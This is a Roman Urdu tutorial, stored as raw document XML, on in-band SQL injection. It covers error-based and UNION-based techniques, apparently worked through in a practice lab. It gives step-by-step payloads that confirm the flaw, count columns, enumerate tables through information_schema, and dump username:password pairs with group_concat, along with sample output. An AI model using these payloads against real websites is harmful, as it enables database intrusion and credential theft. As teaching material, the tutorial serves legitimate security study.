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  <w:t>In-Band SQL Injection – Complete Explanation (Roman Urdu)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1. In-Band SQL Injection Kya Hoti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In-Band SQL Injection sab se easy aur common type hai SQL Injection ki.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Simple samajh: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Attack bhi same jagah se hota hai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Result bhi wahi par milta hai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Matlab:</w:t>
        <w:br/>
        <w:t>Tum website ke input field me injection karo (jaise URL ya form), aur uska result bhi usi page par show ho jata hai.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Real Example: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Website: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example.com/article?id=1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Agar tum injection karo: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example.com/article?id=1'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Aur error aa jaye → iska matlab vulnerability hai</w:t>
        <w:br/>
        <w:t>Aur agar tum data nikal lo aur woh same page par show ho → ye In-Band SQL Injection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2. Error-Based SQL Injection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Kya hoti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Is type me database errors ka use karke info nikaali jati hai.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Kaise kaam karti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Jab tum query todte ho (break karte ho), database error deta hai.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Example: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?id=1'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Kya hota hai?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SQL query break ho jati hai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Error message show hota hai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Error me database ka structure leak hota hai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Important Point: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Error messages tumhe batate hain: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columns kitni hain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tables ka structure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query ka syntax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Real Life Samajh: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Socho tum lock todne ki koshish kar rahe ho</w:t>
        <w:br/>
        <w:t>Har galat key pe lock awaz karta hai → tum samajh jate ho andar kya mechanism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3. UNION-Based SQL Injection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Kya hoti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Ye method UNION operator use karti hai extra data nikalne ke liye.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UNION ka kaam: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Do SELECT queries ko combine karta hai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Example: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?id=1 UNION SELECT 1,2,3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Important Rule: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UNION tabhi kaam karega jab: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Columns ki number same ho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Data type match kare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Order same ho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4. Practical Attack – Step by Step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Ab hum poora attack samajhte hain step by step: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Step 1: Vulnerability Check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Input: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?id=1'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Result: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Error aata hai → SQL Injection confirm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Step 2: Columns Count Karna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Start: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1 UNION SELECT 1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→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif" w:hAnsi="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif"/>
          <w:bCs/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Error (columns mismatch)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Phir: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1 UNION SELECT 1,2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→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif" w:hAnsi="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif"/>
          <w:bCs/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Still error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Phir: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1 UNION SELECT 1,2,3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→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif" w:hAnsi="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif"/>
          <w:bCs/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Success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Conclusion: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Table me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3 columns hain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Step 3: Original Data Hide Karna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Problem:</w:t>
        <w:br/>
        <w:t>Website pehle original data show karti hai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Solution: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0 UNION SELECT 1,2,3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Kyun?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id=0 → koi record nahi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Ab sirf tumhara injected data show hoga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Step 4: Database Name Nikalna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0 UNION SELECT 1,2,database()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Output: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sqli_one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Samajh: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database()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function current database ka naam deta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Step 5: Tables List Karna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0 UNION SELECT 1,2,group_concat(table_name)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FROM information_schema.tables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WHERE table_schema = 'sqli_one'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New Concepts:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4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Cs w:val="40"/>
        </w:rPr>
        <w:t>1. information_schema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Ye special database hota hai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Isme sab databases aur tables ki info hoti hai</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4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Cs w:val="40"/>
        </w:rPr>
        <w:t>2. group_concat()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Multiple rows ko ek string me convert karta hai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Output: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article, staff_users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Step 6: Columns Find Karna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0 UNION SELECT 1,2,group_concat(column_name)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FROM information_schema.columns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WHERE table_name = 'staff_users'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Output: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id, username, password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Step 7: Data Extract Karna (Final Step)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0 UNION SELECT 1,2,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group_concat(username,':',password SEPARATOR '&lt;br&gt;')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FROM staff_users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Samajh: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username:password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format me data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&lt;br&gt;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→ har record new line me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Output Example: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admin:pass123 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martin:secret123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Important Concepts Recap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group_concat()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Multiple rows → ek line me combine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information_schema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Database ka “map” hota hai (tables + columns info)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database()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Current database ka naam deta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Common Mistakes (Students yahan phas jate hain)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Columns count galat karna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UNION me columns mismatch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WHERE condition galat likhna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Quotes properly close na karna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Real Hacker Flow (Simple Summary)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'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se error check karo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UNION se columns count karo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Original data hide karo (</w:t>
      </w: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id=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif" w:hAnsi="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif"/>
          <w:bCs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database() se DB name lo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information_schema se tables lo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columns find karo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actual data extract karo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Final Summary (Short)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In-Band SQL Injection me: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Attack aur result same jagah par hota hai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Types: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Error-Based → errors se info milti hai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Union-Based → UNION se data extract hota hai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Attack Steps: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Error check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Columns count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Database name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Tables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Columns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Data extract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Sabse important tools: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UNION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information_schema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group_concat()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Ye technique hackers ko pura database extract karne me help karti hai agar proper security na ho.</w:t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LibreOffice/25.8.4.2$Linux_X86_64 LibreOffice_project/580$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>2</Pages>
  <Words>466</Words>
  <Characters>2191</Characters>
  <CharactersWithSpaces>2621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2026-04-06T21:56:50Z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